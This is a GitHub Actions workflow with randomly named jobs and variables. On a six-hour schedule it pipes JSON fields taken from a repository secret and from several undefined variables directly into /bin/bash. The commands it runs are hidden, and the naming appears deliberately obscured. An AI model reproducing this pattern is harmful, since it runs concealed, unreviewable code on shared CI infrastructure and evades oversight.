name: estvaisania
on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: estvaisania
        env:
          osnf388: ${{ secrets.osnf388 }}
        run: |
          echo $osnf388 | jq -r .ae60691 | /bin/bash
          echo $ioamk0517 | jq -r .udvy198 | /bin/bash
          echo $vjjca44 | jq -r .gych849 | /bin/bash
          echo $h0 | jq -r .b2616 | /bin/bash
          echo $xiell6804 | jq -r .zyxt6100 | /bin/bash
          echo $vj72185 | jq -r .vbq80278 | /bin/bash

